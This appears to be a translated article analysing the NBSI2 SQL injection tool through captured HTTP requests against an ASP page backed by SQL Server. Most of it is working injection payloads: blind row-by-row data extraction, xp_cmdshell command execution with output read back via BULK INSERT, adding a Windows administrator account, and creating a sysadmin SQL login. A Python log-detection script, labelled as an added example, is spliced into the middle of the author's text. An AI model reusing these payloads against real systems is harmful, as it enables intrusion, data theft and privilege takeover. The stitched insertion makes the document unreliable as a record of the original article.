
Uncovering How NBSI2 Implements Its Internal Functions


  Top1
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%
  20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20
  [TITLE]%20desc)>0 HTTP/1.1
  i.e.: article_read.asp?id=80 And (Select Top 1 isNull(cast([TITLE] as varchar(8000)),char(32))+char(124)
  From (Select Top 1 [TITLE] From [testdb]..[ARTICLE] Where 1=1 Order by [TITLE]) T Order by [TITLE] desc)>0
  This retrieves the value of the TITLE column for the first row; by the same pattern, Top N retrieves the values of the other rows.
  Top2
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%
  20From%20(Select%20Top%202%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20
  [TITLE]%20desc)>0 HTTP/1.1
  TopN
  ...
  Packets captured with wse:
  // get the record count of the article table
  GET /article_read.asp?id=80%20And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[testdb]..[ARTICLE]%
  20Where%201=1)>0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
  3D0
  // get the content of the first record of the Title column in the Article table
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%
  20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20
  [TITLE]%20desc)>0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
  3D0
  ...............
  //////////////////////////////////////////////
  This concludes the analysis of how table names, column names and column contents are retrieved from the database; next we look at the other main functions.
  Step 5: Executing DOS commands and SQL statements
  Executing the DOS command dir c:\
  ////////////////////////////////////////////////
  Packet analysis, with echoed output:
  GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
  3D0
  GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\%20>%20C:\NB_Commander_Txt.log';DROP%20TABLE%
  20NB_Commander_Tmp;CREATE%20TABLE%20NB_Commander_Tmp(ResultTxt%20varchar(7996)%20NULL);BULK%20INSERT%20[testdb]..
  [NB_Commander_Tmp]%20FROM%20'C:\NB_Commander_Txt.log'%20WITH%20(KEEPNULLS);Alter%20Table%20NB_Commander_Tmp%20add%20ID%
  20int%20NOT%20NULL%20IDENTITY%20(1,1)-- HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
  3D0
  The key part is this:
  article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\ > C:\NB_Commander_Txt.log';
  DROP TABLE NB_Commander_Tmp;CREATE TABLE NB_Commander_Tmp(ResultTxt varchar(7996) NULL);
  BULK INSERT [testdb]..[NB_Commander_Tmp] FROM 'C:\NB_Commander_Txt.log' WITH (KEEPNULLS);
  Alter Table NB_Commander_Tmp add ID int NOT NULL IDENTITY (1,1)--
  BULK INSERT copies a data file into a database table or view in a user-specified format.
  KEEPNULLS specifies that empty columns should keep a null value during the bulk copy operation, rather than having default values assigned to the inserted columns.
  For a detailed description, see the T-SQL syntax reference.
  This statement saves the output of the DOS command Dir c:\ to the file NB_Commander_Txt.log, then writes the contents of that file into the newly created temporary table
  NB_Commander_Tmp and adds an auto-incrementing ID column; this should be easy to follow.
  ID=1
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%
  2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=1)=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%
  3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%
  28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%
  5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%
  2D%2D
  i.e.: article_read.asp?id=80 And (Select Top 1 CASE WHEN ResultTxt is Null then '|' else ResultTxt+'|' End
  From NB_Commander_Tmp Where ID=1)=0
  This outputs the first line of the echoed result; the following requests work the same way, and iterating through to the Nth row outputs the entire echoed result.
  ID=2
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%
  2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=2)=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%
  3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%
  28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%
  5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%
  2D%2D
  ID=N
  ...............
  Output shown:
  [不测输出]
  [不测输出]
  [不测输出]
  [不测输出]
  [不测输出]
  [不测输出]
  [不测输出]
  [不测输出]
  [不测输出]
  [不测输出]
  ...
  ...
  ...
  If everything worked normally, all files under C:\ would be listed. The message shown here ("[不测输出]", i.e. unexpected output) probably appears because the table NB_Commander_Tmp was not created successfully, so the result could not be output correctly.
  ////////////////////////////////////////////////
  Packet analysis, without echoed output:
  DOS command Dir C:\
  GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\'-- HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BDROP+TABLE+NB%5FCommander%5FTmp%3BEXEC+MASTER%2E%2EXP%
  5FCMDSHELL+%27DEL+C%3A%5CNB%5FCommander%5FTxt%2Elog%27%2D%2D
  i.e.: article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\'--
  No output needs to be displayed.
  Output shown:
  命令执行完成
  ////////////////////////////////////////////////
  DOS command:
  net user TsInternetUsers Password /add
  GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'net%20user%20TsInternetUsers%20Password%20/add'-- HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C%27%2D%2D
  Other DOS commands are executed in the same way.
  id=80;EXEC MASTER..XP_CMDSHELL 'net user TsInternetUsers Password /add'--
  id=80;EXEC MASTER..XP_CMDSHELL 'net localgroup administrators TsInternetUsers /add'--
  Executing SQL commands (same as executing DOS commands)
  GET /article_read.asp?id=80;exec%20master..sp_addlogin%20UserName,Password-- HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%
  27net+user+TsInternetUsers+Password+%2Fadd%27%2D%2D
  id=80;exec master..sp_addlogin UserName,Password--
  id=80;exec master..sp_addsrvrolemember UserName,sysadmin--
  ....
  ////////////////////////////////////////////////
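From the defender's side, every request captured above leaves a recognisable trace in the web server's access log. As an added example (not code from the article or from NBSI2), the following Python URL-decodes each request's query string and Cookie header and tags the constructs these captures rely on: stacked queries after `;`, `xp_cmdshell`, `BULK INSERT`, `sp_addlogin`/`sp_addsrvrolemember`, and the `And (Select ...)>0` inference pattern. The tag names and sample requests are constructed; the samples are modelled on the captures shown above.

```python
"""Flag NBSI2-style SQL injection in web access logs (added example, not
code from the original article): URL-decode each request's query string
and Cookie header, then match the T-SQL constructs the captures above use."""
import re
from urllib.parse import unquote_plus

# (regex over the decoded, lower-cased request, tag for the analyst)
INDICATORS = [
    (r";\s*(exec|drop\s+table|create\s+table|bulk\s+insert|alter\s+table)\b",
     "stacked-query"),
    (r"\bxp_cmdshell\b", "os-command-execution"),
    (r"\bsp_add(login|srvrolemember)\b", "login-or-role-manipulation"),
    (r"\bbulk\s+insert\b", "file-to-table-import"),
    (r"\band\s*\(\s*select\b.*\)\s*[>=]\s*0\b", "boolean-inference"),
    (r"\bsysobjects\b|\bdb_name\s*\(", "schema-enumeration"),
]

def classify(url: str, cookie: str = "") -> set[str]:
    """Indicator tags found in one request's URL and Cookie header.
    The Cookie is scanned too: NBSI2 echoes the previous payload back in
    the 'articleid' cookie, as the captures above show."""
    text = (unquote_plus(url) + " " + unquote_plus(cookie)).lower()
    return {tag for pattern, tag in INDICATORS if re.search(pattern, text)}

def scan(requests):
    """(url, sorted tags) for every request that triggers at least one tag."""
    hits = []
    for url, cookie in requests:
        tags = classify(url, cookie)
        if tags:
            hits.append((url, sorted(tags)))
    return hits

# Constructed samples modelled on the requests captured in the article.
SAMPLES = [
    ("/article_read.asp?id=80", ""),
    ("/article_read.asp?id=80%20And%20(Select%20Cast(Count(1)%20as%20varchar(8000))"
     "%2Bchar(124)%20From%20[testdb]..[ARTICLE]%20Where%201=1)>0",
     "articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0"),
    ("/article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\\'--", ""),
    ("/article_read.asp?id=80;BULK%20INSERT%20[testdb]..[NB_Commander_Tmp]"
     "%20FROM%20'C:\\NB_Commander_Txt.log'%20WITH%20(KEEPNULLS)--", ""),
    ("/article_read.asp?id=80;exec%20master..sp_addsrvrolemember%20UserName,sysadmin--", ""),
]

if __name__ == "__main__":
    for url, tags in scan(SAMPLES):
        print(url, "->", ", ".join(tags))
```

The legitimate `id=80` request produces no tag, so the same rules can run over a full log without flooding the analyst; the `stacked-query` tag alone is enough to justify confirming that `xp_cmdshell` is disabled and that the web application's database login is not a member of sysadmin.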
  This concludes the analysis of Nb2's main functions; the remaining functions you can analyse yourselves. This is the first time I have written such a long article, so it is probably quite messy and surely has a number of problems, but I really don't have the energy
  to go back and correct it word by word. I hope everyone can follow it. Thanks.
 


    Author: 福州军威计算机技术有限公司 (Fuzhou Junwei Computer Technology Co., Ltd.)
    Copyright notice: original work; reproduction is permitted provided the original source, author information and this notice are indicated with a hyperlink. Otherwise legal liability will be pursued.
